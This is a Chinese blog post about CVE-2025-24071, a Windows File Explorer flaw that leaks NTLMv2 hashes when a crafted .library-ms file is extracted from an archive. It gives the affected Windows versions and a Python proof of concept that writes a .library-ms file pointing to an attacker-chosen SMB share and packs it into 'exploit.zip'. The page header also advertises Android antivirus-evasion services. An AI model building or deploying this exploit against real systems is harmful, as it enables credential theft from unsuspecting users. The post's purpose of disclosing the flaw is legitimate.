投稿获客
广告
广告 广告 广告
广告 广告 广告 广告
广告 █ 推荐【菠萝云】香港16G内存99元 【CDNCloud】极速、安全可靠的加速体验 广告位联系QQ:253000106 【UStat】免费网站统计平台 SSL证书低至2折 单域名36元起 免费测试!海总一手APK免杀处理 广告位联系QQ:253000106 CDN 服务器 反炸 劫持 域名屏蔽 【UStat】专业网站统计平台 域名注册:海量域名快速注册 安卓免杀 谷歌报毒 封装 苹果签名 广告位联系QQ:253000106 【域名被劫持污染如何处理】 安卓免杀★超级签★封装★谷歌屏蔽 广告位联系QQ:253000106

*本站广告为第三方投放,如发生纠纷,请向本站索取第三方联系方式沟通

  1. 创想鸟首页
  2. 系统教程

CVE-2025-24071|Windows 文件资源管理器欺骗漏洞(POC)

程序猿 系统教程 阅读 0

cve-2025-24071|windows 文件资源管理器欺骗漏洞(poc)

0x00 前言

Windows 文件资源管理器(File Explorer)作为Windows系统的关键组成部分,承担着管理与访问本地及网络文件资源的核心职能。它提供用户友好的图形界面,支持文件的浏览、复制、移动、删除、重命名等基本操作,同时集成了网络共享、外部设备识别、文件搜索与过滤等高级功能,是日常多任务文件处理不可或缺的工具

0x01 漏洞概述

当用户使用Windows资源管理器解压含有恶意构造的 

.library-ms

文件的ZIP或RAR压缩包时,系统会自动解析该文件中嵌入的SMB路径(例如:192.168.1.116shared),进而触发向远程服务器发起NTLM身份验证请求,造成用户的NTLMv2哈希值在无交互情况下被泄露。

0x02 CVE编号

CVE-2025-24071

0x03 受影响版本

Windows Server 2012 R2 (Server Core installation)Windows Server 2012 R2Windows Server 2016 (Server Core installation)Windows Server 2016Windows 10 Version 1607 for x64-based SystemsWindows 10 Version 1607 for 32-bit SystemsWindows 10 for x64-based SystemsWindows 10 for 32-bit SystemsWindows Server 2025Windows 11 Version 24H2 for x64-based SystemsWindows 11 Version 24H2 for ARM64-based SystemsWindows Server 2022, 23H2 Edition (Server Core installation)Windows 11 Version 23H2 for x64-based SystemsWindows 11 Version 23H2 for ARM64-based SystemsWindows Server 2025 (Server Core installation)Windows 10 Version 22H2 for 32-bit SystemsWindows 10 Version 22H2 for ARM64-based SystemsWindows 10 Version 22H2 for x64-based SystemsWindows 11 Version 22H2 for x64-based SystemsWindows 11 Version 22H2 for ARM64-based SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows Server 2022 (Server Core installation)Windows Server 2022Windows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems

0x04 漏洞利用示例(POC)

项目地址:

https://www.php.cn/link/35f4421c476ab29bd7492717ccb0642c

import osimport zipfiledef main():    file_name = input("Enter your file name: ")    ip_address = input("Enter IP (EX: 192.168.1.162): ")    library_content = f"""                    \{ip_address}shared            """    library_file_name = f"{file_name}.library-ms"    with open(library_file_name, "w", encoding="utf-8") as f:        f.write(library_content)    with zipfile.ZipFile("exploit.zip", mode="w", compression=zipfile.ZIP_DEFLATED) as zipf:        zipf.write(library_file_name)    if os.path.exists(library_file_name):        os.remove(library_file_name)    print("completed")if __name__ == "__main__":    main()

0x05 参考资料

https://www.php.cn/link/f08f86e95c9d083c89f058285f9ff636

以上就是CVE-2025-24071|Windows 文件资源管理器欺骗漏洞(POC)的详细内容,更多请关注创想鸟其它相关文章!

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/190821.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
0 0

关于作者

程序猿的头像

程序猿签约作者

348.1K 文章
0 评论
1 粉丝
这个人很懒,什么都没有留下~
上一篇 2025年11月1日 13:02:45
下一篇 2025年11月1日 13:07:17

相关推荐

发表回复

登录后才能评论
关注微信